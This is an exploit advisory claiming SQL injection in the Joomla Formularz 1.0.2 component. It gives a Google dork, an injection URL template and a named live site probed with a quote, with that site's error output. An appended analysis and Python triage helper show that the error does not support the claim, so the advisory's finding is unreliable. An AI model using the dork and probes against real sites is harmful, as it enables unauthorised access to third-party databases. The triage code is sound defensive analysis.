- ####################################################################
- # Exploit Title : Joomla Formularz Components 1.0.2 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : joomla.pl
- # Software Download Link : joomla.pl/zasoby/na-twoja-witryne/formularz-w-5-minut
- # Software Version : 1.0.2
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:"/index.php?option=com_formularz"
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010304
- packetstormsecurity.com/files/151424/Joomla-Formularz-1.0.2-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- "Formularz" (Polish for "form") is an open source component for Joomla.
- ####################################################################
- # Impact :
- ***********
- The Formularz 1.0.2 component for Joomla! is prone to an SQL injection vulnerability
- because it fails to sufficiently sanitize user-supplied data (the `formularz` request
- parameter) before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_formularz&formularz=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] spb-pba.org.pl/index.php?option=com_formularz&formularz=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Fatal error: Uncaught exception 'RuntimeException' with message 'Unknown column
- 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM
- `sev_redirect_links` WHERE `old_url` = 'http://www.spb-pba.org.pl
- /index.php?option=com_formularz&formularz=1\'' LIMIT 0, 1' in
- /var/www/html/users/s/p/spbwww/www.spb-pba.org.pl/libraries/joomla/database
- /driver/mysqli.php:610 Stack trace: #0 /var/www/html/users/s/p/spbwww
- /www.spb-pba.org.pl/libraries/joomla/database/driver.php(1279):
- JDatabaseDriverMysqli->execute() #1 /var/www/html/users/s/p/spbwww
- /www.spb-pba.org.pl/plugins/system/redirect/redirect.php(86): JDatabaseDriver->
- loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(Exception))
- #3 {main} thrown in /var/www/html/users/s/p/spbwww
- /www.spb-pba.org.pl/libraries/joomla/
- database/driver/mysqli.php on line 610
-
- Note on this error: the statement that failed is not a com_formularz query. It is the
- lookup that Joomla's system redirect plugin (plugins/system/redirect/redirect.php,
- PlgSystemRedirect::handleError) runs against `sev_redirect_links` when it handles a
- 404, and it fails because that table has no `header` column, i.e. the site's database
- schema is out of date. The injected quote appears in that statement escaped by the
- database driver (formularz=1\'), so this output does not show the `formularz` parameter
- reaching a component query unescaped. A reproducible finding needs a database error or
- a behaviour change (e.g. 1' vs 1'' giving different responses) from the component's own
- query, with the quote visible in the failing SQL as typed.
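- Added example (not part of this advisory and not code from the Formularz component): a Python
- triage helper for Joomla fatal errors like the one above. It extracts the failing statement and
- the stack frame that issued it, lists the tables the statement touches, and reports whether the
- probe's quote reached the SQL unescaped. Run on the advisory's error text it reports the quote as
- escaped and the query as issued by plugins/system/redirect. A second, constructed error (table and
- file names made up for the example, not taken from any site) shows the shape a real finding has.

```python
"""Triage helper for Joomla "Uncaught exception ... SQL=..." fatal errors.

Added example, not part of the advisory or of the Formularz component: it
pulls the failing statement and the stack frame that issued it out of a PHP
fatal error, lists the tables the statement touches, and reports whether the
probe's quote reached the SQL unescaped.  Only an unescaped quote inside a
statement issued by the component under test is evidence of injection in it.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Error text reproduced from the advisory above, with the line wrapping removed.
ADVISORY_ERROR = (
    "Fatal error: Uncaught exception 'RuntimeException' with message 'Unknown column "
    "'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM "
    "`sev_redirect_links` WHERE `old_url` = 'http://www.spb-pba.org.pl"
    "/index.php?option=com_formularz&formularz=1\\'' LIMIT 0, 1' in "
    "/var/www/html/users/s/p/spbwww/www.spb-pba.org.pl/libraries/joomla/database"
    "/driver/mysqli.php:610 Stack trace: #0 /var/www/html/users/s/p/spbwww"
    "/www.spb-pba.org.pl/libraries/joomla/database/driver.php(1279): "
    "JDatabaseDriverMysqli->execute() #1 /var/www/html/users/s/p/spbwww"
    "/www.spb-pba.org.pl/plugins/system/redirect/redirect.php(86): JDatabaseDriver->"
    "loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(Exception)) "
    "#3 {main} thrown in /var/www/html/users/s/p/spbwww/www.spb-pba.org.pl/libraries/joomla/"
    "database/driver/mysqli.php on line 610"
)

# Constructed counter-example (made up for this example, not from any real site):
# the shape a genuine finding has, i.e. the quote sits unescaped inside a query
# issued from the component's own code.  Table and file names are hypothetical.
HYPOTHETICAL_ERROR = (
    "Fatal error: Uncaught exception 'RuntimeException' with message 'You have an error "
    "in your SQL syntax near ''' at line 1 SQL=SELECT * FROM `demo_forms` WHERE `id` = 1'' "
    "in /srv/site/libraries/joomla/database/driver/mysqli.php:610 Stack trace: "
    "#0 /srv/site/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() "
    "#1 /srv/site/components/com_formularz/models/form.php(40): JDatabaseDriver->loadObject() "
    "#2 {main} thrown in /srv/site/libraries/joomla/database/driver/mysqli.php on line 610"
)

SQL_RE = re.compile(r"SQL=(?P<sql>.*?)' in (?P<file>/\S+):(?P<line>\d+)")
MSG_RE = re.compile(r"with message '(?P<msg>.*?) SQL=")
FRAME_RE = re.compile(r"#\d+ (?P<file>/\S+)\((?P<line>\d+)\): (?P<call>\S+)")
TABLE_RE = re.compile(r"\b(?:FROM|JOIN|UPDATE|INTO)\s+`?(\w+)`?", re.IGNORECASE)


@dataclass
class FailedQuery:
    message: str
    sql: str
    driver_file: str
    driver_line: int
    frames: list[tuple[str, int, str]] = field(default_factory=list)  # innermost first


def parse_joomla_fatal(text: str) -> FailedQuery:
    """Split a Joomla/PHP 'Uncaught exception ... SQL=...' fatal error into its parts."""
    flat = " ".join(text.split())  # undo the line wrapping of a pasted error
    sql = SQL_RE.search(flat)
    if sql is None:
        raise ValueError("no 'SQL=' statement found; this is not a database error")
    msg = MSG_RE.search(flat)
    frames = [(m["file"], int(m["line"]), m["call"]) for m in FRAME_RE.finditer(flat)]
    return FailedQuery(
        message=msg["msg"] if msg else "",
        sql=sql["sql"].strip(),
        driver_file=sql["file"],
        driver_line=int(sql["line"]),
        frames=frames,
    )


def tables_in(sql: str) -> list[str]:
    """Tables named after FROM/JOIN/UPDATE/INTO in the failing statement."""
    return TABLE_RE.findall(sql)


def issuing_frame(fq: FailedQuery) -> tuple[str, int, str] | None:
    """First stack frame outside libraries/: the extension code that built the query."""
    for frame in fq.frames:
        if "/libraries/" not in frame[0]:
            return frame
    return None


def quote_state(sql: str, probe: str) -> str:
    """How the probe (value plus its injected quote, e.g. "1'") shows up in the SQL:
    'unescaped' (quote as typed), 'escaped' (driver wrote \\'), or 'absent'."""
    if not probe.endswith("'"):
        raise ValueError("probe must end with the injected single quote")
    if probe in sql:
        return "unescaped"
    if probe[:-1] + "\\'" in sql:
        return "escaped"
    return "absent"


def assess(error_text: str, probe: str, component: str) -> dict:
    """Decide whether a fatal error is evidence of SQL injection in `component`."""
    fq = parse_joomla_fatal(error_text)
    frame = issuing_frame(fq)
    state = quote_state(fq.sql, probe)
    issued_by_component = frame is not None and f"/components/{component}/" in frame[0]
    return {
        "message": fq.message,
        "tables": tables_in(fq.sql),
        "issued_by": frame[0] if frame else fq.driver_file,
        "quote": state,
        "evidence_of_injection": state == "unescaped" and issued_by_component,
    }


if __name__ == "__main__":
    for label, text in (("advisory", ADVISORY_ERROR), ("hypothetical", HYPOTHETICAL_ERROR)):
        print(label, assess(text, "1'", "com_formularz"))
```

- On a real target use a distinctive probe value (e.g. zq1' rather than 1') so the quote check
- cannot match a stray `1'` in unrelated SQL; `evidence_of_injection` is only true when the
- unescaped quote sits in a statement issued from components/<name>/, which is the condition the
- advisory's error does not meet.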
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################